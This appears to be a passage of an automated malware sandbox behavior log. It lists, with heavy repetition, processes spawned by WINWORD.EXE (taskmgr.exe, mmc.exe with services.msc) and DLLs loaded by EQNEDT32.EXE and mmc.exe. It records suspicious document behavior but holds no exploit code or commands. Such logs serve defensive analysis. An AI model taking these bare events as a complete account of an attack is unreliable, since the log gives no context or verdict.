Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\taskmgr.exe "C:\Windows\system32\taskmgr.exe"	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\taskmgr.exe "C:\Windows\system32\taskmgr.exe"	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\taskmgr.exe "C:\Windows\system32\taskmgr.exe"	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\taskmgr.exe "C:\Windows\system32\taskmgr.exe"	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\taskmgr.exe "C:\Windows\system32\taskmgr.exe"	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\taskmgr.exe "C:\Windows\system32\taskmgr.exe"	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\taskmgr.exe "C:\Windows\system32\taskmgr.exe"	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\taskmgr.exe "C:\Windows\system32\taskmgr.exe"	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\taskmgr.exe "C:\Windows\system32\taskmgr.exe"	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\taskmgr.exe "C:\Windows\system32\taskmgr.exe"	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\taskmgr.exe "C:\Windows\system32\taskmgr.exe"	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\taskmgr.exe "C:\Windows\system32\taskmgr.exe"	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\taskmgr.exe	Process created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"	Jump to behavior
Source: C:\Windows\System32\taskmgr.exe	Process created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"	Jump to behavior
Source: C:\Windows\System32\taskmgr.exe	Process created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"	Jump to behavior
Source: C:\Windows\System32\taskmgr.exe	Process created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"	Jump to behavior
Source: C:\Windows\System32\taskmgr.exe	Process created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"	Jump to behavior
Source: C:\Windows\System32\taskmgr.exe	Process created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"	Jump to behavior
Source: C:\Windows\System32\taskmgr.exe	Process created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"	Jump to behavior
Source: C:\Windows\System32\taskmgr.exe	Process created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"	Jump to behavior
Source: C:\Windows\System32\taskmgr.exe	Process created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"	Jump to behavior
Source: C:\Windows\System32\taskmgr.exe	Process created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"	Jump to behavior
Source: C:\Windows\System32\taskmgr.exe	Process created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"	Jump to behavior
Source: C:\Windows\System32\taskmgr.exe	Process created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"	Jump to behavior
Source: C:\Windows\System32\taskmgr.exe	Process created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"	Jump to behavior
Source: C:\Windows\System32\taskmgr.exe	Process created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"	Jump to behavior
Source: C:\Windows\System32\taskmgr.exe	Process created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"	Jump to behavior
Source: C:\Windows\System32\taskmgr.exe	Process created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"	Jump to behavior
Source: C:\Windows\System32\taskmgr.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\taskmgr.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\taskmgr.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\taskmgr.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\taskmgr.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\taskmgr.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: msi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: mshtml.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: secur32.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: webio.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: sxs.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: credssp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: msls31.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: mfc42u.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: odbc32.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: mmcbase.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: mmfutil.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: mfc42u.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: odbc32.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: mmcbase.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: mmfutil.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: mfc42u.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: odbc32.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: mmcbase.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: duser.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: dui70.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: version.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: bcrypt.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: atl.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: mmfutil.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: dwmapi.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: rpcrtremote.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: d2d1.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: dwrite.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: dxgi.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: d3d11.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: d3d10warp.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: winmm.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: msls31.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: mfc42u.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: odbc32.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: mmcbase.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: duser.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: dui70.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: version.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: bcrypt.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: atl.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: mmfutil.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: dwmapi.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: rpcrtremote.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: winmm.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: d2d1.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: dwrite.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: dxgi.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: d3d11.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: d3d10warp.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: msls31.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: mfc42u.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: odbc32.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: mmcbase.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: duser.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: dui70.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: version.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: bcrypt.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: atl.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: mmfutil.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: dwmapi.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: rpcrtremote.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: d2d1.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: dwrite.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: dxgi.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: d3d11.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: d3d10warp.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: msls31.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: winmm.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: mfc42u.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: odbc32.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: mmcbase.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: duser.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: dui70.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: version.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: bcrypt.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: atl.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: mmfutil.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: dwmapi.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: rpcrtremote.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: winmm.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: d2d1.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: dwrite.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: dxgi.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: d3d11.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: d3d10warp.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: msls31.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: mfc42u.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: odbc32.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: mmcbase.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: duser.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: dui70.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: version.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: bcrypt.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: atl.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: mmfutil.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: dwmapi.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: rpcrtremote.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: winmm.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: d2d1.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: dwrite.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: dxgi.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: d3d11.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: d3d10warp.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: msls31.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: mfc42u.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: odbc32.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: mmcbase.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: duser.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: dui70.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: version.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: bcrypt.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: atl.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: mmfutil.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: dwmapi.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: rpcrtremote.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: d2d1.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: dwrite.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: dxgi.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: d3d11.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: d3d10warp.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: winmm.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: msls31.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: mfc42u.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: odbc32.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: mmcbase.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: duser.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: dui70.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: version.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: bcrypt.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: atl.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: mmfutil.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: dwmapi.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: rpcrtremote.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: d2d1.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: dwrite.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: dxgi.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: d3d11.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: d3d10warp.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: msls31.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: winmm.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: mfc42u.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: odbc32.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: mmcbase.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: duser.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: dui70.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: version.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: bcrypt.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: atl.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: mmfutil.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: dwmapi.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: rpcrtremote.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: d2d1.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: dwrite.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: dxgi.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: d3d11.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: d3d10warp.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: winmm.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: msls31.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: mfc42u.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: odbc32.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: mmcbase.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: duser.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: dui70.dll
Source: C:\Windows\System32\mmc.exe	Section loaded: version.dll
